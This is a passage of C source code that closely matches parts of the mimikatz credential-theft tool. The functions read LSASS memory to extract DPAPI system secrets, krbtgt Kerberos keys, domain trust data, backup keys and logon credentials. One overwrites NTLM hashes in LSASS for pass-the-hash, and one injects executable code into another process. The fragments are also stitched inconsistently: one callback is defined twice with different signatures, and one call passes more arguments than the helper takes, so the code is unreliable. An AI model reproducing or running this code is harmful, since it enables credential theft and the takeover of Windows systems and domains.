else if((readInfos.Protect & 0xf0) && ((readInfos.Protect & 0xf0) < PAGE_EXECUTE_READWRITE))
tempProtect = PAGE_EXECUTE_READWRITE;
if(tempProtect)
resultProtect = kull_m_memory_protect(&destination, szPatch, tempProtect | flags, &oldProtect);
if(resultProtect)
{
if(result = kull_m_memory_copy(&destination, pPatch, szPatch))
{
if(pCallBackBeforeRestore)
{
status = pCallBackBeforeRestore(argc, args);
if(pRetCallBack)
*pRetCallBack = status;
result = kull_m_memory_copy(&destination, &backup, szPatch);
}
}
if(oldProtect)
kull_m_memory_protect(&destination, szPatch, oldProtect, NULL);
}
}
if(backup.address)
LocalFree(backup.address);
}
}
return result;
}
NTSTATUS kuhl_m_sekurlsa_dpapi_system(int argc, wchar_t * argv[])
{
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {NULL, &hLocalMemory};
PKUHL_M_SEKURLSA_PACKAGE pPackage = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package;
PVOID pBool = NULL, pShaSystem = NULL, pShaUser = NULL;
BOOL fSystemCredsInitialized;
BYTE origInit, rgbSystemCredMachine[SHA_DIGEST_LENGTH], rgbSystemCredUser[SHA_DIGEST_LENGTH];
if(NT_SUCCESS(status))
{
if(pPackage->Module.isPresent)
{
origInit = pPackage->Module.isInit;
if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &pPackage->Module, SysCredReferences, ARRAYSIZE(SysCredReferences), &pBool, &pShaSystem, &pShaUser, NULL))
{
pPackage->Module.isInit = origInit; // trick to use same packages as normal module.
aLocal.address = &fSystemCredsInitialized;
aLsass.address = pBool;
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(fSystemCredsInitialized)))
{
if(fSystemCredsInitialized)
{
kprintf(L"DPAPI_SYSTEM\n");
aLocal.address = &rgbSystemCredMachine;
aLsass.address = pShaSystem;
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(rgbSystemCredMachine)))
{
aLocal.address = &rgbSystemCredUser;
aLsass.address = pShaUser;
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(rgbSystemCredUser)))
{
kprintf(L"full: ");
kull_m_string_wprintf_hex(rgbSystemCredMachine, sizeof(rgbSystemCredMachine), 0);
kull_m_string_wprintf_hex(rgbSystemCredUser, sizeof(rgbSystemCredUser), 0);
kprintf(L"\nm/u : ");
kull_m_string_wprintf_hex(rgbSystemCredMachine, sizeof(rgbSystemCredMachine), 0);
kprintf(L" / ");
kull_m_string_wprintf_hex(rgbSystemCredUser, sizeof(rgbSystemCredUser), 0);
kprintf(L"\n");
}
}
}
else PRINT_ERROR(L"Not initialized!\n");
}
}
}
else PRINT_ERROR(L"DPAPI service not in LSASS memory\n");
}
return status;
}
BOOL CALLBACK kuhl_m_sekurlsa_enum_range(PMEMORY_BASIC_INFORMATION pMemoryBasicInformation, PVOID pvArg)
{
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &hBuffer};
KULL_M_MEMORY_ADDRESS aLsassMem = {NULL, (PKULL_M_MEMORY_HANDLE) pvArg};
PBYTE pZone;
PUNICODE_STRING donnees;
if((pMemoryBasicInformation->Protect & PAGE_READWRITE) && !(pMemoryBasicInformation->Protect & PAGE_GUARD) && (pMemoryBasicInformation->Type == MEM_PRIVATE))
{
aLsassMem.address = pMemoryBasicInformation->BaseAddress;
if(aBuffer.address = LocalAlloc(LPTR, pMemoryBasicInformation->RegionSize))
{
if(kull_m_memory_copy(&aBuffer, &aLsassMem, pMemoryBasicInformation->RegionSize))
{
for(pZone = (PBYTE) aBuffer.address; pZone < (PBYTE) aBuffer.address + pMemoryBasicInformation->RegionSize; pZone += sizeof(LONG)) // TODO fixe memory boundary
{
donnees = (PUNICODE_STRING) pZone;
if(kull_m_string_suspectUnicodeStringStructure(&donnees[0]) && kull_m_string_suspectUnicodeStringStructure(&donnees[1]) && kull_m_string_suspectUnicodeStringStructure(&donnees[2]))
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) donnees, NULL, KUHL_SEKURLSA_CREDS_DISPLAY_LINE | KUHL_SEKURLSA_CREDS_DISPLAY_WPASSONLY | KUHL_SEKURLSA_CREDS_DISPLAY_NEWLINE);
}
}
LocalFree(aBuffer.address);
}
}
return TRUE;
}
NTSTATUS kuhl_m_sekurlsa_krbtgt(int argc, wchar_t * argv[])
{
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
LONG l = 0;
DUAL_KRBTGT dualKrbtgt = {NULL, NULL};
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {&dualKrbtgt, &hLocalMemory};
if(NT_SUCCESS(status))
{
if(kuhl_m_sekurlsa_kdcsvc_package.Module.isPresent)
{
if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, SecDataReferences, ARRAYSIZE(SecDataReferences), &aLsass.address, NULL, NULL, &l))
{
aLsass.address = (PBYTE) aLsass.address + sizeof(PVOID) * l;
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(DUAL_KRBTGT)))
{
kuhl_m_sekurlsa_krbtgt_keys(dualKrbtgt.krbtgt_current, L"Current");
kuhl_m_sekurlsa_krbtgt_keys(dualKrbtgt.krbtgt_previous, L"Previous");
}
}
}
else PRINT_ERROR(L"KDC service not in LSASS memory\n");
}
return status;
}
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKIWI_MSV1_0_PRIMARY_CREDENTIALS pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData)
{
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL)(pCredentials->Credentials.Buffer);
PMSV1_0_PTH_DATA_CRED pthDataCred = (PMSV1_0_PTH_DATA_CRED)pOptionalData;
KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL };
KULL_M_MEMORY_ADDRESS aLocalMemory = { pPrimaryCreds, &hLocalMemory };
if (RtlEqualString(&pCredentials->Primary, &PRIMARY_STRING, FALSE))
{
(*pthDataCred->pSecData->lsassLocalHelper->pLsaUnprotectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
if(pthDataCred->pthData->NtlmHash)
{
RtlCopyMemory(pPrimaryCreds->NtOwfPassword, pthDataCred->pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
pPrimaryCreds->isNtOwfPassword = TRUE;
}
else
{
RtlZeroMemory(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH);
pPrimaryCreds->isNtOwfPassword = FALSE;
}
RtlZeroMemory(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH);
RtlZeroMemory(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH);
pPrimaryCreds->isLmOwfPassword = FALSE;
pPrimaryCreds->isShaOwfPassword = FALSE;
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
kprintf(L"Data copy @ %p : ", origBufferAddress->address);
if (pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
kprintf(L"OK !");
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
}
else kprintf(L".");
return TRUE;
}
BOOL kull_m_memory_equal(IN PKULL_M_MEMORY_ADDRESS Address1, IN PKULL_M_MEMORY_ADDRESS Address2, IN SIZE_T Lenght)
{
BOOL status = FALSE;
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
switch(Address1->hMemory->type)
{
case KULL_M_MEMORY_TYPE_OWN:
switch(Address2->hMemory->type)
{
case KULL_M_MEMORY_TYPE_OWN:
status = RtlEqualMemory(Address1->address, Address2->address, Lenght);
break;
default:
status = kull_m_memory_equal(Address2, Address1, Lenght);
break;
}
break;
default:
if(aBuffer.address = LocalAlloc(LPTR, Lenght))
{
if(kull_m_memory_copy(&aBuffer, Address1, Lenght))
status = kull_m_memory_equal(&aBuffer, Address2, Lenght);
LocalFree(aBuffer.address);
}
break;
}
return status;
}
BOOL kuhl_m_sekurlsa_utils_search_generic(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PVOID * genericPtr, PVOID * genericPtr1, PLONG genericOffset1)
{
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, cLsass->hLsassMem}, aLocalMemory = {NULL, &hLocalMemory};
KULL_M_MEMORY_SEARCH sMemory = {{{pLib->Informations.DllBase.address, cLsass->hLsassMem}, pLib->Informations.SizeOfImage}, NULL};
PKULL_M_PATCH_GENERIC currentReference;
#ifdef _M_X64
LONG offset;
#endif
if(currentReference = kull_m_patch_getGenericFromBuild(generics, cbGenerics, cLsass->osContext.BuildNumber))
{
aLocalMemory.address = currentReference->Search.Pattern;
if(kull_m_memory_search(&aLocalMemory, currentReference->Search.Length, &sMemory, FALSE))
{
aLsassMemory.address = (PBYTE) sMemory.result + currentReference->Offsets.off0; // optimize one day
if(genericOffset1)
*genericOffset1 = currentReference->Offsets.off1;
#ifdef _M_X64
aLocalMemory.address = &offset;
if(pLib->isInit = kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(LONG)))
*genericPtr = ((PBYTE) aLsassMemory.address + sizeof(LONG) + offset);
#elif defined _M_IX86
aLocalMemory.address = genericPtr;
pLib->isInit = kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(PVOID));
#endif
if(genericPtr1)
{
aLsassMemory.address = (PBYTE) sMemory.result + currentReference->Offsets.off1;
#ifdef _M_X64
aLocalMemory.address = &offset;
if(pLib->isInit = kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(LONG)))
*genericPtr1 = ((PBYTE) aLsassMemory.address + sizeof(LONG) + offset);
#elif defined _M_IX86
aLocalMemory.address = genericPtr1;
pLib->isInit = kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(PVOID));
#endif
}
}
}
return pLib->isInit;
}
void kuhl_m_sekurlsa_bkey(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, BOOL isExport)
{
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass->hLsassMem}, aData = {NULL, &hBuffer};
GUID guid;
DWORD cb;
PVOID pGuid, pKeyLen, pKeyBuffer;
if(kuhl_m_sekurlsa_utils_search_generic(cLsass, pLib, generics, cbGenerics, &pGuid, &pKeyLen, &pKeyBuffer, NULL))
{
if(aLsass.address = pGuid)
{
aData.address = &guid;
if(kull_m_memory_copy(&aData, &aLsass, sizeof(GUID)))
{
kull_m_string_displayGUID(&guid); kprintf(L"\n");
if(aLsass.address = pKeyLen)
{
aData.address = &cb;
if(kull_m_memory_copy(&aData, &aLsass, sizeof(DWORD)))
{
if(cb && (aLsass.address = pKeyBuffer))
{
aData.address = &aLsass.address;
if(kull_m_memory_copy(&aData, &aLsass, sizeof(PVOID)))
{
if(aData.address = LocalAlloc(LPTR, cb))
{
if(kull_m_memory_copy(&aData, &aLsass, cb))
{
kuhl_m_lsadump_analyzeKey(&guid, (PKIWI_BACKUP_KEY) aData.address, cb, isExport);
}
LocalFree(aData.address);
}
}
}
}
}
}
}
}
}
BOOL kull_m_process_peb(PKULL_M_MEMORY_HANDLE memory, PPEB pPeb, BOOL isWOW)
{
BOOL status = FALSE;
PROCESS_BASIC_INFORMATION processInformations;
HANDLE hProcess = (memory->type == KULL_M_MEMORY_TYPE_PROCESS) ? memory->pHandleProcess->hProcess : GetCurrentProcess();
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aBuffer = {pPeb, &hBuffer};
KULL_M_MEMORY_ADDRESS aProcess= {NULL, memory};
PROCESSINFOCLASS info;
ULONG szPeb, szBuffer, szInfos;
LPVOID buffer;
#ifdef _M_X64
if(isWOW)
{
info = ProcessWow64Information;
szBuffer = sizeof(processInformations.PebBaseAddress);
buffer = &processInformations.PebBaseAddress;
szPeb = sizeof(PEB_F32);
}
else
{
#endif
info = ProcessBasicInformation;
szBuffer = sizeof(processInformations);
buffer = &processInformations;
szPeb = sizeof(PEB);
#ifdef _M_X64
}
#endif
switch(memory->type)
{
#ifndef MIMIKATZ_W2000_SUPPORT
case KULL_M_MEMORY_TYPE_OWN:
if(!isWOW)
{
*pPeb = *RtlGetCurrentPeb();
status = TRUE;
break;
}
#endif
case KULL_M_MEMORY_TYPE_PROCESS:
if(NT_SUCCESS(NtQueryInformationProcess(hProcess, info, buffer, szBuffer, &szInfos)) && (szInfos == szBuffer) && processInformations.PebBaseAddress)
{
aProcess.address = processInformations.PebBaseAddress;
status = kull_m_memory_copy(&aBuffer, &aProcess, szPeb);
}
break;
}
return status;
}
PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuid(PKULL_M_MEMORY_ADDRESS pTable, ULONG LUIDoffset, PLUID luidToFind)
{
PVOID resultat = NULL;
RTL_AVL_TABLE maTable;
KULL_M_MEMORY_ADDRESS data = {&maTable, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
if(kull_m_memory_copy(&data, pTable, sizeof(RTL_AVL_TABLE)))
{
pTable->address = maTable.BalancedRoot.RightChild;
resultat = kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(pTable, LUIDoffset, luidToFind);
}
return resultat;
}
BOOL kull_m_remotelib_CreateRemoteCodeWitthPatternReplace(PKULL_M_MEMORY_HANDLE hProcess, LPCVOID Buffer, DWORD BufferSize, PMULTIPLE_REMOTE_EXT RemoteExt, PKULL_M_MEMORY_ADDRESS DestAddress)
{
BOOL success = FALSE;
DWORD i, j;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLocalAddr = {(LPVOID) Buffer, &hLocalMemory};
DestAddress->hMemory = hProcess;
DestAddress->address = NULL;
if(RemoteExt)
{
if(kull_m_remotelib_GetProcAddressMultipleModules(hProcess, RemoteExt))
{
if(aLocalAddr.address = LocalAlloc(LPTR, BufferSize))
{
RtlCopyMemory(aLocalAddr.address, Buffer, BufferSize);
for(i = 0; i < BufferSize - sizeof(PVOID); i++)
{
for(j = 0; j < RemoteExt->count; j++)
{
if((PVOID) RemoteExt->extensions[j].ToReplace == *(PVOID *) ((PBYTE) aLocalAddr.address + i))
{
*(PVOID *) ((PBYTE) aLocalAddr.address + i) = RemoteExt->extensions[j].Pointer;
//kprintf(L"Found =) - %.*S - %s!%S -> %p\n", sizeof(PVOID), &RemoteExt->extensions[j].ToReplace, RemoteExt->extensions[j].Module, RemoteExt->extensions[j].Function, *(PVOID *) ((PBYTE) aLocalAddr.address + i));
i += sizeof(PVOID) - 1;
}
}
}
}
}
}
if(aLocalAddr.address)
{
if(kull_m_memory_alloc(DestAddress, BufferSize, PAGE_EXECUTE_READWRITE))
{
if(!(success = kull_m_memory_copy(DestAddress, &aLocalAddr, BufferSize)))
{
PRINT_ERROR_AUTO(L"kull_m_memory_copy");
kull_m_memory_free(DestAddress, 0);
}
}
else PRINT_ERROR_AUTO(L"kull_m_memory_alloc / VirtualAlloc(Ex)");
if(RemoteExt)
LocalFree(aLocalAddr.address);
}
else PRINT_ERROR(L"No buffer ?\n");
return success;
}
NTSTATUS kuhl_m_sekurlsa_trust(int argc, wchar_t * argv[])
{
NTSTATUS status = kuhl_m_sekurlsa_acquireLSA();
PVOID buffer;
KDC_DOMAIN_INFO domainInfo;
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, data = {&buffer, &hBuffer}, aBuffer = {&domainInfo, &hBuffer};
if(cLsass.osContext.BuildNumber >= KULL_M_WIN_BUILD_7)
{
if(NT_SUCCESS(status))
{
if(kuhl_m_sekurlsa_kdcsvc_package.Module.isPresent)
{
if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, DomainListReferences, ARRAYSIZE(DomainListReferences), &aLsass.address, NULL, NULL, NULL))
{
if(kull_m_memory_copy(&data, &aLsass, sizeof(PVOID)))
{
data.address = buffer;
data.hMemory = cLsass.hLsassMem;
while(data.address != aLsass.address)
{
if(kull_m_memory_copy(&aBuffer, &data, sizeof(KDC_DOMAIN_INFO)))
{
kuhl_m_sekurlsa_trust_domaininfo(&domainInfo);
data.address = domainInfo.list.Flink;
}
else break;
}
}
}
}
else PRINT_ERROR(L"KDC service not in LSASS memory\n");
}
}
else PRINT_ERROR(L"Only for >= 2008r2\n");
return status;
}
BOOL kull_m_string_getSid(IN PSID * pSid, IN PKULL_M_MEMORY_HANDLE source)
{
BOOL status = FALSE;
BYTE nbAuth;
DWORD sizeSid;
KULL_M_MEMORY_HANDLE hOwn = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aDestin = {&nbAuth, &hOwn};
KULL_M_MEMORY_ADDRESS aSource = {(PBYTE) *pSid + 1, source};
*pSid = NULL;
if(kull_m_memory_copy(&aDestin, &aSource, sizeof(BYTE)))
{
aSource.address = (PBYTE) aSource.address - 1;
sizeSid = 4 * nbAuth + 6 + 1 + 1;
if(aDestin.address = LocalAlloc(LPTR, sizeSid))
{
*pSid = (PSID) aDestin.address;
status = kull_m_memory_copy(&aDestin, &aSource, sizeSid);
}
}
return status;
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_LIVESSP_LIST_ENTRY credentials;
KIWI_LIVESSP_PRIMARY_CREDENTIAL primaryCredential;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
if(kuhl_m_sekurlsa_livessp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_livessp_package.Module, LiveReferences, ARRAYSIZE(LiveReferences), (PVOID *) &LiveGlobalLogonSessionList, NULL, NULL, NULL))
{
aLsassMemory.address = LiveGlobalLogonSessionList;
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
{
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_LIVESSP_LIST_ENTRY)))
{
if(aLsassMemory.address = credentials.suppCreds)
{
aLocalMemory.address = &primaryCredential;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL)))
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData, (pData->cLsass->osContext.BuildNumber != 9431) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT);
}
}
}
} else kprintf(L"KO");
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
{
KIWI_LIVESSP_LIST_ENTRY credentials;
KIWI_LIVESSP_PRIMARY_CREDENTIAL primaryCredential;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, cLsass->hLsassMem};
if(kuhl_m_sekurlsa_livessp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_livessp_package.Module, LiveReferences, sizeof(LiveReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &LiveGlobalLogonSessionList, NULL, NULL))
{
aLsassMemory.address = LiveGlobalLogonSessionList;
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), logId))
{
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_LIVESSP_LIST_ENTRY)))
{
if(aLsassMemory.address = credentials.suppCreds)
{
aLocalMemory.address = &primaryCredential;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL)))
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, logId, (cLsass->osContext.BuildNumber != 9431) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT, externalCallback, externalCallbackData);
}
}
}
} else kprintf(L"KO");
}
